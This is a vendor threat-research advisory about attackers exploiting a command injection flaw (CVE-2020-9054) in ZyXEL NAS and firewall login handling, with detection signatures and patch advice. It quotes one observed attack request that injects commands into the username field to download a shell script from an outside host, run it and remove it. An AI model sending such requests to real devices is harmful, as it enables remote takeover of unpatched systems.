Hackers actively targeting remote code execution vulnerability on ZyXEL devices
SonicWall Capture Labs Threat Research team observed attackers actively targeting Zyxel NAS (Network Attached Storage) and firewall products affected by a remote code execution vulnerability.
Vulnerability | CVE-2020-9054
A NAS system is a storage device connected to a network that allows storage and retrieval of data from a centralized location for authorized network users and heterogeneous clients. ZyXEL NAS devices perform authentication by using the weblogin.cgi program. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains OS command, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code with root privileges on the device.
We observe the below hits more often as attackers scan for the vulnerable devices. In the username parameter, it sends the command “ls,” a vulnerable device will return without any error.
On vulnerable devices, the attacker performs the below Http GET request which attempts to download a shell script to the “tmp” directory, execute the shell script “test.sh”, and later remove the script.
"GET /adv,/cgi-bin/weblogin.cgi?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F22.214.171.124%2Ftest.sh%3Bsh+test.sh%3Brm+test.sh HTTP/1.1"
A quick search on shodan shows few hundreds of the affected ZyXEL NAS devices exposed online.
SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:
IPS: 15005 ZyXEL Firewall/NAS Remote Code Execution
ZyXEL NAS products running firmware version 5.21 and earlier are affected by this vulnerability.
Users are recommended to install the standard firmware patches immediately. No updates available for NAS products that reached end-of-support, users are advised not to leave the product directly exposed to the internet. If possible, connect it to a security router or firewall for additional protection.
Find vendor advisory here